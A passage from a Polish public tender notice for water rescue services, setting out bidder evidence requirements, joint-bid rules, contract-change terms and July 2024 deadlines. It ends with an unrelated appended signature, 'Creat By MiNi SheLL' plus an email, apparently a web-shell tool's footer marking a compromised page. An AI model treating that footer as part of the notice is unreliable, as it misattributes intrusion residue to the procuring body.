niż 90 000,00 zł brutto a okres usługi już wykonanej - będzie nie krótszy niż 5 miesięcy a dowody o których mowa w pkt 10.3 lit. b) SWZ potwierdzą, że usługa wykonywana jest należycie przez okres nie krótszy niż 5 miesięcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie wymaga się</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	decyzja (zgoda) ministra właściwego do spraw wewnętrznych na wykonywanie ratownictwa wodnego wydanej na podstawie art. 12 ust. 1 ustawy z dnia 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych (t.j.: Dz. U z 2023 r. poz. 714 z późn. zm.)<br/>b)	wpis do rejestru jednostek współpracujących z systemem Państwowe Ratownictwo Medyczne, o którym mowa w art. 17 ust. 1 ustawy z dnia 8 września 2006 r. o Państwowym Ratownictwie Medycznym (t.j.: Dz. U. z 2023 r. poz. 1541 ze późn.zm.).<br/>c)	wykaz usług (zgodny z załącznikiem nr 4 do SWZ) wykonanych lub wykonywanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz <br/>z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest <br/>w stanie uzyskać tych dokumentów - oświadczenie wykonawcy.<br/>W przypadku usług wykonywanych zastrzega się że referencje bądź inne dokumenty potwierdzające należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Uwaga!<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wykaz o którym mowa w ppkt c) dotyczy usług, <br/>w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie wymaga się <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający dopuszcza możliwość składania oferty przez Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia tj. spółki cywilne lub konsorcja (tj. dwóch lub więcej Wykonawców) <br/>w ramach oferty wspólnej w rozumieniu art. 58 ustawy pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>1)	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu <br/>i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>3) Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>•	postępowania o zamówienie publiczne, którego dotyczy,<br/>•	wszystkich Wykonawców ubiegających się wspólnie udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>•	ustanowionego Pełnomocnika oraz zakresu jego umocowania.<br/>4)	Dokument pełnomocnictwa musi być podpisany przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, przy czym nie jest wymagany podpis pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców.<br/>5)	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>6)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>7)	W przypadku, o którym mowa w pkt. 5) i 6) wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (wg załącznika nr 5 do SWZ)<br/>8)	Oświadczenie, o którym mowa w pkt. 10.1. lit b) SWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu, w zakresie, w jakim każdy z wykonawców wskazuje spełnienie warunków udziału w postępowaniu.<br/>9)	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W odniesieniu do art. 455 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w przypadkach określonych <br/>w § 12 projektowanych postanowień umowy stanowiących Załącznik nr 3 do SWZ w niżej wymienionym zakresie: <br/>1.	Stosowanie do postanowień art. 455 ust. 1 pkt 1 Pzp, Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w następującym zakresie i przypadkach:<br/>a)	w zakresie zwiększenia zakresu przedmiotu zamówienia, polegającym na zleceniu Wykonawcy dodatkowych godzin usług świadczenia usług ratownictwa wodnego <br/>b)	wprowadzenia dodatkowych obowiązków Wykonawcy z uwagi na wystąpienie nieprzewidzianych na etapie zawierania umowy okoliczności będących efektem działań Zamawiającego np. nieprzewidziane zdarzenie w okolicy siedziby Zamawiającego, które wymaga pomocy pracowników Zamawiającego posiadających kwalifikacje dla ratowników medycznych takich jak katastrofa w ruchu drogowym i wynikająca z tego zmiana wynagrodzenia Wykonawcy – liczona według stawek przedstawionych przez Wykonawcę w formularzu ofertowym Wykonawcy stanowiącym załącznik Nr 3 do niniejszej umowy<br/>c)	zmiany terminu realizacji umowy w tym w szczególności wydłużenia terminu w przypadku zwiększenia zakresu przedmiotu zamówienia, polegającym na dodatkowych godzinach świadczenia przez Wykonawcę usług z tym zastrzeżeniem, że termin ten może zostać wydłużony maksymalnie o 30 dni.<br/>d)	zwiększenia wynagrodzenia umownego o którym mowa w §6 ust. 1 umowy w przypadku zwiększenia zakresu przedmiotu zamówienia o którym mowa w §12 ust. 1 lit. a) umowy – liczona według stawki za 1 roboczogodzinę o której mowa w § 6 ust. 2 umowy z tym zastrzeżeniem, że zmiana ta nie może przekroczyć 10% wartości umowy. <br/>e)	zmiany osób wymienionych w wykazie o którym mowa w § 3 ust. 3 wyznaczonych do realizacji zamówienia, z zastrzeżeniem iż Wykonawca zobowiązany jest wyznaczyć pracowników spełniających wymogi określone w § 3 ust. 2 umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://osirzoliborz.ezamawiajacy.pl/pn/osirzoliborz/demand/165096/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-10 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. TERMIN WYKONANIA ZAMÓWIENIA: <br/>5 miesięcy od dnia zawarcia umowy, jednak nie wcześniej niż od dnia 1 sierpnia 2024 r. do dnia 31.12.2024 r. <br/><br/>2. Podstawy wykluczenia<br/>Zamawiający wykluczy z postępowania Wykonawców, w stosunku do których zachodzą przesłanki wykluczenia wskazane w art. 108 ust. 1 ustawy Pzp oraz w art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r., poz. 1497).

Creat By MiNi SheLL
Email: jattceo@gmail.com